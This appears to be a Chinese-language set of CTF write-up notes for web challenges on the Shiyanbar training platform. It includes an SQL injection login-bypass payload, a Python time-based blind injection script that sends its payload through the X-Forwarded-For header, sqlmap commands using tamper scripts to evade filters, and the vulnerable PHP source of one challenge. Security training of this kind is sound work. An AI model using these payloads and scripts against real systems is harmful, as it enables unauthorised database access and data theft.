已经过滤了/ # -- select or union |
等,但是没有过滤单引号
payload:username=pcat'='&password=pcat'='
原sql语句为:
select * from user where username='用户名' and password='密码'
拼接后为:
select * from user where username='pcat'='' and password='pcat'=''
计算机首先计算username='pcat'
,返回为0(false),再计算0=”,结果为1
最终语句等同于
select * from user where 1 and 1
即
select * from user
关于弱类型的比较:
以下情况都会为true
1=’1’
1=’1.0’
1=’1后接字母(再后面有数字也可以)’
0=’除了非0数字开头的字符串’
(总体上只要前面达成0的话,要使语句为true很简单,所以这题的万能密码只要按照我上面的法子去写一大把)
# -*- coding: utf-8 -*-
import requests
import time
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.{}-'
flag = ''
def exp(x, i):
starttime = time.time()
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
xxx = "' or sleep(ascii(mid((select(flag)from(flag))from(" + str(x) + ")for(1)))=ascii('" + i + "')) and '1'='1"
headers = {
"Host": "ctf5.shiyanbar.com",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate",
"Cookie": "PHPSESSID=oh30tdquhsp2ff227bgpj5eb02; Hm_lvt_34d6f7353ab0915a4c582e4516dffbc3=1473428030,1473473503,1473553816,1473608536; Hm_lpvt_34d6f7353ab0915a4c582e4516dffbc3=1473608555; Hm_cv_34d6f7353ab0915a4c582e4516dffbc3=1*visitor*73570%2CnickName%3Ayiyang",
"Connection": "keep-alive",
"X-FORWARDED-FOR": xxx
}
res = requests.get(url, headers=headers)
s = time.time() - starttime;
if s > 1:
return 1
else:
return 0
for x in range(1, 33):
for i in payloads:
if (exp(x, i)):
flag += i
print flag
break
else:
pass
print 'flag:' + flag
error_reporting(0);
if (!isset($_POST['uname']) || !isset($_POST['pwd'])) {
echo '."
";
echo ''."
";
echo ''."
";
echo ''."
";
echo ''."
";
echo ''."
";
die;
}
function AttackFilter($StrKey,$StrValue,$ArrReq){
if (is_array($StrValue)){
$StrValue=implode($StrValue);
}
if (preg_match("/".$ArrReq."/is",$StrValue)==1){
print "水可载舟,亦可赛艇!";
exit();
}
}
$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)";
foreach($_POST as $key=>$value){
AttackFilter($key,$value,$filter);
}
$con = mysql_connect("XXXXXX","XXXXXX","XXXXXX");
if (!$con){
die('Could not connect: ' . mysql_error());
}
$db="XXXXXX";
mysql_select_db($db, $con);
$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";
$query = mysql_query($sql);
if (mysql_num_rows($query) == 1) {
$key = mysql_fetch_array($query);
if($key['pwd'] == $_POST['pwd']) {
print "CTF{XXXXXX}";
}else{
print "亦可赛艇!";
}
}else{
print "一颗赛艇!";
}
mysql_close($con);
?>
http://blog.csdn.net/qq_34841823/article/details/54287419
直接sqlmap跑一遍就行
python sqlmap.py -u 'http://ctf5.shiyanbar.com/web/index_3.php?id=1' --risk 3 --level 3 -D web1 -T flag --dump
过滤了空格间隔的关键字,采用tamper中的空格转化/**/的脚本绕过
python sqlmap.py -u 'http://ctf5.shiyanbar.com/web/index_2.php?id=1' --tamper space2comment.py --risk 3 --level 3 -D web1 -T flag --dump
过滤了关键字,采用tamper中的关键字前加注释的脚本绕过
python sqlmap.py -u 'http://ctf5.shiyanbar.com/web/index_2.php?id=1' --tamper halfversionedmorekeywords.py --risk 3 --level 3 -D web1 -T flag --dump
通过脚本实现base64快速转换
import base64
import urllib2
import urllib
url = 'http://ctf5.shiyanbar.com/web/10/10.php'
req = urllib2.Request(url)
rsp = urllib2.urlopen(req)
flag = rsp.info().getheader('FLAG')
flag = base64.b64decode(flag)
flag = flag.split(':')[1]
print flag
data = urllib.urlencode({'key':flag})
req1 = urllib2.Request(url, data=data)
rsp = urllib2.urlopen(req1).read()
print rsp
这个正在研究
在研究
编码绕过
‘安女神’ 转换为’编码格式’
http://tool.chinaz.com/tools/unicode.aspx
请求表单中有个隐藏的传输参数showsource=0,改为1就会出现结果
查看源码
太累了,明天继续